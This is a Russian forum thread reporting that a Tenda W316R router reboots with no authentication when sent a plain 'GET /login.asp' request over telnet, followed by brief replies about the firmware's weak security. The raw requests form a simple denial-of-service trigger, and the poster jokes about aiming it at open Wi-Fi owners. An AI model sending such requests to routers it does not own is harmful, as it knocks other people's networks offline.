LINUX.ORG.RU

Tenda W316R — перезагрузка роутера без авторизации

 , , ,


1

2

Дело было в субботу вечером утром, было слишком нудно. Игрался с телнетом путём отправки первому попавшемуся девайсу HTTP-запросов. Девайсом оказалась Tenda W316R с прошивкой от производителя.

GET / HTTP/1.0

HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Thu Jan 01 00:11:14 1970
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://192.168.0.1/login.asp

<html><head></head><body>
                This document has moved to a new <a href="http://192.168.0.1/login.asp">location</a>.
                Please update your documents to reflect the new location.
                </body></html>

Ок, пройдём по этому редиректу:
GET /login.asp HTTP/1.0

Внезапно вместо вываливания ожидаемой простыни тегов с полями ввода логина и пароля соединение разорвалось, роутер зажёг все активные и неактивные индикаторы, после чего я зашёл в админку роутера с обычного браузера и увидел нулевой аптайм. Подозреваю что на сабжевое поведение влияет отсутствие юзерагента либо каких-либо заголовков, передаваемых обычным браузером, но ведь это же по-сути решето? Возможное практическое применение — можно засунуть задание в крон/планировщик заданий и перезагружать роутер каждый день/ночь/при запуске системы либо вынести ярлычок на рабочий стол и не вспоминать пароль когда что-то отвалится. Также, пользуясь случаем, хочу передать привет альтруистам-мазохистам с вафлей без пароля.

★☆

Последнее исправление: cetjs2 (всего исправлений: 3)

Tenda
asp на роутере
2015

Сжечь.

Также, пользуясь случаем, хочу передать привет альтруистам-мазохистам с вафлей без пароля.

Намучаешся MAC подбирать.

spoilt ★★★
()
Ответ на: комментарий от spoilt

MAC подбирать.

Зачем? Или ты о том что среди всех роутеров у людей проблематично найти именно этот для успешного проведения атаки? А то у нас местный провайдер одно время такие нахаляву раздавал.

h578b1bde ★☆
() автор топика

Также, пользуясь случаем, хочу передать привет альтруистам-мазохистам с вафлей без пароля.

у тэнды есть такая прошивка в которой просто нету аутентификации.

snaf ★★★★★
()
Ответ на: комментарий от spoilt

Сжечь.

Там не настоящий ASP. Там какая-то невменяемая хурма, как на многих китайцах.

Dark_SavanT ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.